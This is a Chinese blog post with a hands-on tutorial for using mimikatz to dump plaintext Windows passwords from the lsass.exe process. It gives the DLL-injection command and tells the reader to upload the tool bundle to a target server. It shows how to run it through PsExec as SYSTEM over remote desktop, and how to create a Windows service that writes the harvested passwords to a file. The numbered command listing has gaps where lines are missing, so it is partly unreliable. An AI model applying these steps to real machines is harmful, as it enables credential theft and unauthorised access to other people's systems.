昨天弄了下OphCrack,一个破解windows密码的玩意,顺带想起了这个神器,mimikatz,本人首创中文译名为:咪咪卡住,不要笑,这是很严肃的名字。
咪咪卡住的下载地址:
http://blog.gentilkiwi.com/mimikatz
mimikat是一个法国人写的轻量级调试器,因为牛逼,所以成了神器。神器之所以出名了,是因为神器可以直接从 lsass.exe 里获取windows处于active状态账号明文密码,是很强大的。下面看看从我的Win7 64位上面抓密码。
进入咪咪卡住的目录,运行:
6 | inject::process lsass.exe sekurlsa.dll |
不管密码多么复杂都能抓出来
作者的回答的原因是,在llsass中,明文密码经过加密算法的密文 (这个加密算法是可逆的 能被解密出明文)
这个咪咪卡住啦,支持
在远程终端(3389、mstsc.exe)、虚拟桌面中抓取密码的方法:
通常你在远程终端中运行该程序会提示:存储空间不足,无法处理此命令。
这是因为在终端模式下,不能插入远线程,跨会话不能注入,你需要使用如下方法执行该程序:
首先提取几个文件,只抓取密码的话,只需要这几个文件:
1 | mimikatz_trunk\tools\PsExec.exe |
2 | mimikatz_trunk\Win32\mimikatz.exe |
3 | mimikatz_trunk\Win32\sekurlsa.dll |
打包后上传至目标服务器,然后解压释放,注意路径中绝对不能有中文(可以有空格)!否则加载DLL的时候会报错:找不到文件。
然后使用以下任何一种方法即可抓取密码:
1 | //最简单实用的方法,使用 PsExec.exe 启动。 |
2 | //在系统帐户中运行 cmd.exe,或者直接运行 mimikatz.exe |
5 | C:\mimikatz_trunk\Win32\mimikatz.exe |
8 | //注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)! |
9 | inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll" |
12 | //退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。 |
15 | //********************************************************* |
20 | //********************************************************* |
23 | sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt" |
27 | //********************************************************* |
写篇文章不容易,转载请注明来源,如果喜欢本站可以Feed订阅本站。